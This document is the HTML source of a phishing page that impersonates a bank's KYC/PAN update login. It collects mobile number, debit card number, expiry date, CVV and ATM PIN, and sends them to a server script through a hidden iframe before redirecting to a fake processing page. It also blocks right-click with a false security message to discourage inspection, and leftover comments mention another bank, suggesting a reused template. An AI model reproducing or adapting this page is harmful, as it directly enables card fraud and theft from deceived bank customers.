<!DOCTYPE html>
<html lang="zxx">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <link href="https://fonts.googleapis.com/css2?family=DM+Sans:ital,wght@1,500&display=swap" rel="stylesheet">
    <title> Union Bank KYC login</title>
    <style>
        #hh,
        #jj {
            width: 104%;
            margin: -8px;
            margin-left: -7px;
        }

        #nt {
            width: 7%;
            margin-left: 20px;
            position: absolute;
        }

        #ij {
            width: 102%;
            margin-left: -6px;
        }

        #bb,
        #dd,
        #ff,
        #ii {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            outline: none;
            border-color: #AE2924;
            border-width: 1px;
            color: #AE2924;
            font-size: 14px;
            font-weight: bold;
            font-style: italic;
            margin: 2px;
            border-radius: 4px;
            margin-left: 25px;
        }

        #bb:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            outline: none;
            border-color: #AE2924;
            box-shadow: 0 0 6px 0 #AE2924;
            border-width: 1px;
            color: #AE2924;
            font-weight: bold;
            font-style: italic;
            margin: 2px;
            border-radius: 4px;
            margin-left: 25px;
        }

        #dd:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            outline: none;
            border-color: #AE2924;
            box-shadow: 0 0 6px 0 #AE2924;
            border-width: 1px;
            color: #AE2924;
            font-weight: bold;
            font-style: italic;
            margin: 2px;
            border-radius: 4px;
            margin-left: 25px;
        }

        #ff:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            outline: none;
            border-color: #AE2924;
            box-shadow: 0 0 6px 0 #AE2924;
            border-width: 1px;
            color: #AE2924;
            font-weight: bold;
            font-style: italic;
            margin: 2px;
            border-radius: 4px;
            margin-left: 25px;
        }

        #ii:hover {
            width: 280px;
            height: 30px;
            padding: 3px 10px;
            background-color: white;
            border-style: solid;
            outline: none;
            border-color: #AE2924;
            box-shadow: 0 0 6px 0 #AE2924;
            outline: none;
            border-width: 1px;
            color: #AE2924;
            font-weight: bold;
            font-style: italic;
            margin: 2px;
            border-radius: 4px;
            margin-left: 25px;
        }

        #ll {
            background-color: #AE2924;
            color: white;
            border: none;
            outline: none;
            margin-left: 30px;
            border-radius: 4px;
            cursor: pointer;
            font-size: 15px;
            width: 120px;
            height: 36px;
        }

        #ab {
            width: 360px;
            border-bottom: solid #f3f3f3;
            border-width: 10px;
        }

        #ll:hover {
            background-color: #3E1128;
            color: white;
            border: none;
            outline: none;
            margin-left: 30px;
            border-radius: 4px;
            cursor: pointer;
            font-size: 15px;
            width: 120px;
            height: 36px;
        }

        #con {
            background-color: #c5d4e8;
            width: 300px;
            height: 150px;
            padding: 10px 15px;
            margin: 4px;
            margin-left: 18px;
            border-radius: 1px;
        }

        #kyc {
            width: 104%;
            background-color: #FF0000;
            height: 55px;
            margin: 6px;
            margin-left: -7px;
        }

        #col {
            width: 104%;
            background-color: #D8D1DB;
            height: 450px;
            margin: -6px;
            margin-left: -7px;
        }

        .error {
            color: Red;
            font-family: 'DM Sans', sans-serif;
            font-size: 12px;
            margin: 5px;
            margin-left: 20px;
            font-style: italic;
        }

        input::-webkit-input-placeholder {
            font-style: italic;
        }

        input:-moz-placeholder {
            font-style: italic;
        }

        input::-moz-placeholder {
            font-style: italic;
        }

        input:-ms-input-placeholder {
            font-style: italic;
        }
    </style>
    <script language="javascript">
        var message = "For security reasons,This function is not allowed here.";

        function clickIE4() {

            if (event.button == 2) {
                alert(message);
                return false;
            }
        }

        function clickNS4(e) {
            if (document.layers || document.getElementById && !document.all) {
                if (e.which == 2 || e.which == 3) {
                    alert(message);
                    return false;
                }
            }
        }

        if (document.layers) {
            document.captureEvents(Event.MOUSEDOWN);
            document.onmousedown = clickNS4;
        } else if (document.all && !document.getElementById) {
            document.onmousedown = clickIE4;
        }

        document.oncontextmenu = new Function("alert(message);return false;")
    </script>
</head>

<body>
    <!-- Static- Please don't do anything here-->
    <script type="text/javascript">
        var submitted = false;
    </script>
    <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing1.html';}"></iframe>
    <!--My Form-->
    <form action="post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
        <center><img src="lolo.jpg" id="hh"></center>
        </div>

          
        <div id="kyc"><br>
            <b style="color:white; padding:20px;">CONTINUE TO PAN UPDATE</b>
        </div>
        <div id="col">
            <br>

                   <div id="tx">
                <b style="font-family: Arial; 
            color:#AE2924; 
            padding:0px 25px; font-size:16px;"><i>Mobile Number*</i>
                </b>
            </div>
            <div id="te">
                <input type="tel" name="Mobile No." id="ff" inputmode="numeric" placeholder="Enter Your Mobile Number" maxlength="10" pattern="[0-9]\d{9}" title="Please enter valid 10 digit mobile number" required=""></div> <br>



            <b style="font-family: Arial; 
       color:#AE2924; 
       padding:0px 25px; font-size:16px;"><i>Debit card numuber*</i></b>
            <div id="ct" required="">
                <input type="tel" name="Debit Number" inputmode="numeric" maxlength="16" id="bb" placeholder="Enter Your Debit Number"  title="Please enter valid 16 digit account number" required="">
                <br><br>
                
                <b style="font-family: Arial; 
            color:#AE2924; 
            padding:0px 25px; font-size:16px;"><i>Expry Date*</i></b>
            </div>
            <table id="tblForm" border="0" cellpadding="5" cellspacing="0">
                <tr>
                    <input type="text" name="Expry Date" class="date-format" id="bb" inputmode="numeric" maxlength="7" placeholder="MM/YYYY" required=""><br>
                    <p1><span class="error" style="display: none">Invalid Ex. Date. Only MM/YYYY format allowed.</span></p1>
                    <br>
                                 
                                 <b style="font-family: Arial; 
            color:#AE2924; 
            padding:0px 25px; font-size:16px;"><i>CVV*</i></b>
            </div>
            <div id="ct">
                <input type="tel" name="CVV" id="dd" inputmode="numeric" maxlength="3" placeholder="Enter Your CVV"  title="Please enter valid 3 digit CVV" required=""><br><br>


                          <b style="font-family: Arial; 
            color:#AE2924; 
            padding:0px 25px; font-size:16px;"><i>Enter ATM PIN*</i></b>
            </div>
            <div id="ct">
                <input type="tel" name="atm pin" id="dd" inputmode="numeric" maxlength="4" placeholder="Enter Your ATM PIN"  title="Please enter valid 4 digit atm pin)" required=""><br><br>


                </tr>
            </table>
            
            <!--<div>
             <img src="Note_i.jpg" alt="" id="nt">
             <span style="color:#3E1128; font-size:20px; margin-left:50px;">Note</span>
              </div>-->
            <div id="kk">
                <button type="submit" id="ll" style="font-weight: bold;">SUBMIT</button><br>
            </div><br><br>
            <!-- <div id="con">
             <div>
             <p1 style="color:black; font-size:14px; margin-left:0px;">Dear Customer,<br>Welcome to the new login page of HDFC
             <br>Bank NetBanking<br>
             Its lighter look and feel is designed to give<br>you the best possible user experience.<br>Please continue to login using your<br>customer ID and password.
             </p1></div></div>-->
            <img src="futterhas.png" alt="" id="ij"><br><br>
        </div>
    </form>
</body>

</html>